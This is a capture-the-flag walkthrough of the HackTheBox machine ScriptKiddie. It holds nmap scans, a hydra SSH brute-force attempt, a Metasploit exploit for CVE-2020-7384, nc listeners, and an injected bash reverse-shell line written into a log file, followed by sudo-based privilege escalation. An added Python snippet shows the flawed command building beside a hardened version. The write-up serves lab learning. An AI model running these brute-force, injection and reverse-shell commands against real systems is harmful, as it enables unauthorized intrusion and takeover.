sudo vim /etc/hosts   # add the line: 10.10.10.226 scriptkiddie.htb
sudo nmap -sS -Pn -p 1433,445,135,5985,3389,22,1521,3306,6379,5432,389,25,110,143,443,5900,21,873,27017,23,3690,1099,5984,5632,3389,80-100,7000-10000,13389,13306,11433,18080 -n --open --min-hostgroup 1024 --min-parallelism 1024 --host-timeout 30 -T4 -v scriptkiddie.htb
Warning: You specified a highly aggressive --min-hostgroup.
Warning: Your --min-parallelism option is pretty high! This can hurt reliability.
Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-19 10:35 CST
WARNING: Duplicate port number(s) specified. Are you alert enough to be using Nmap? Have some coffee or Jolt(tm).
Initiating SYN Stealth Scan at 10:35
Scanning scriptkiddie.htb (10.10.10.226) [3050 ports]
Discovered open port 22/tcp on 10.10.10.226
Completed SYN Stealth Scan at 10:35, 2.62s elapsed (3050 total ports)
Nmap scan report for scriptkiddie.htb (10.10.10.226)
Host is up (0.22s latency).
Not shown: 2062 closed ports, 987 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE
22/tcp open  ssh

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 2.73 seconds
           Raw packets sent: 5005 (220.220KB) | Rcvd: 2152 (86.084KB)
Only port 22 is open. Is this really meant to be brute-forced?
hydra -L /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt -V -t 50 ssh://10.10.10.226:22
Brute-forcing with hydra for a long time produced nothing, so port 22 is probably not the intended route; the nmap result must be at fault. That scan command only pays off a little when the goal is raw nmap speed.
nmap -T4 -A scriptkiddie.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-19 10:45 CST
Warning: 10.10.10.226 giving up on port because retransmission cap hit (6).
Nmap scan report for scriptkiddie.htb (10.10.10.226)
Host is up (0.21s latency).
Not shown: 974 closed ports
PORT      STATE    SERVICE          VERSION
22/tcp    open     ssh              OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
89/tcp    filtered su-mit-tg
903/tcp   filtered iss-console-mgr
1028/tcp  filtered unknown
1065/tcp  filtered syscomlan
1141/tcp  filtered mxomss
1151/tcp  filtered unizensus
1718/tcp  filtered h323gatedisc
2008/tcp  filtered conf
2009/tcp  filtered news
2179/tcp  filtered vmrdp
3333/tcp  filtered dec-notes
5000/tcp  open     http             Werkzeug httpd 0.16.1 (Python 3.8.5)
|_http-title: k1d'5 h4ck3r t00l5
5051/tcp  filtered ida-agent
5800/tcp  filtered vnc-http
5907/tcp  filtered unknown
6100/tcp  filtered synchronet-db
7800/tcp  filtered asr
8333/tcp  filtered bitcoin
8402/tcp  filtered abarsd
9290/tcp  filtered unknown
16001/tcp filtered fmsascon
32770/tcp filtered sometimes-rpc3
32777/tcp filtered sometimes-rpc17
50636/tcp filtered unknown
52673/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 210.86 seconds
Port 22 has already been brute-forced, so look at HTTP on port 5000.
It looks like a big webshell-style toolbox. After studying it for a long time I still could not work out how to exploit it, so I finally glanced at someone else's walkthrough and learned that the key is the payloads section: the Android reverse-shell generator is reachable through the exploit for CVE-2020-7384. After downloading that exploit, add it to msfconsole by creating a new folder under metasploit-framework/modules/exploits and moving the downloaded rb file into it. I had originally created a new rb file and pasted the code in, but after starting msfconsole it was not loaded even after reload_all.
sudo msfconsole
use exploit/newexploit/metasploit_msfvenom_apk_template_cmd_injection
set lhost 10.10.14.2
set lport 4444
exploit
[+] msf.apk stored at /root/.msf4/local/msf.apk
Move the generated msf.apk into the current user's home directory so it is easy to use.
sudo chmod 777 msf.apk
nc -lvnp 4444
Give the file permissions, and use nc to listen on port 4444, which is the port the reverse shell connects back to.
Choose android as the OS, fill in your own IP address as lhost, upload msf.apk and click generate; nc then receives the shell. The incoming connection has no prompt or user identifier, so use python3 to get back into a proper bash shell.
python3 -c "import pty;pty.spawn('/bin/bash')"
Got a shell and read the user flag.
The home directory holds two users, kid and pwn.
Looking at scanlosers.sh in pwn's directory, it is the script behind the nmap call on port 5000, and its lou parameter shows what to do next.
When the condition is true it runs the nmap scan; when it is not true it returns the contents of hackers as output.
So write a reverse-shell command into hackers.
First start nc listening on port 4242.
Then write the following line in. Note the two spaces before the semicolon: with a single space, the connection back to nc never arrived.
echo " ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.2/4242 0>&1' #" >> hackers
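The weakness being used here is that a field taken from the attacker-writable hackers log is spliced straight into a shell command string, so the field can terminate the nmap command and start another. As an added defender-side example (not code from the box or from the original post), the snippet below shows that unsafe string-building beside a hardened reader that accepts a field only if it parses as an IP address and hands it to nmap as its own argv element. The log layout "date time ip" and the nmap flags are assumptions; the log lines are constructed, and the injection marker is a harmless echo.

```python
import ipaddress
import subprocess

# Constructed sample of a "hackers"-style log, one "<date> <time> <ip>" per line.
# The last line carries a constructed injection marker in the IP field; the
# leading space survives the split exactly as the two-space trick above relies on.
SAMPLE_LOG = """\
2021-02-19 10:35:01 10.10.14.2
2021-02-19 10:36:12 10.10.14.7
2021-02-19 10:37:40 10.10.14.2
2021-02-19 10:40:00  ;echo INJECTED #
"""

def extract_fields(log_text):
    """Mimic cut -d' ' -f3-: keep everything after the second space of each line."""
    return [line.split(" ", 2)[2] for line in log_text.splitlines() if line.strip()]

def unsafe_command(field):
    """The vulnerable pattern (assumed): the raw field becomes part of an sh -c string."""
    return f"nmap --top-ports 10 {field}"

def valid_ip(field):
    """Accept only a well-formed IPv4/IPv6 literal; anything else is rejected."""
    try:
        ipaddress.ip_address(field.strip())
        return True
    except ValueError:
        return False

def safe_targets(log_text):
    """Hardened reader: deduplicate and drop every field that is not an IP literal."""
    seen = []
    for field in extract_fields(log_text):
        ip = field.strip()
        if valid_ip(ip) and ip not in seen:
            seen.append(ip)
    return seen

def safe_argv(ip):
    """Pass the target as a separate argv element so no shell ever parses it."""
    return ["nmap", "--top-ports", "10", ip]

def scan(ip):
    # A list argument with the default shell=False never invokes /bin/sh.
    return subprocess.run(safe_argv(ip), capture_output=True, text=True)

if __name__ == "__main__":
    for f in extract_fields(SAMPLE_LOG):
        print("unsafe command line:", repr(unsafe_command(f)))
    print("targets that would actually be scanned:", safe_targets(SAMPLE_LOG))
```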
Once the connection comes back to nc, the shell has higher privileges. Running scanlosers.sh did nothing. ?? Then sudo -l was used to check which commands can be run with sudo.
sudo can run msfconsole directly.
sudo msfconsole
With root privileges, read the root flag in the root directory.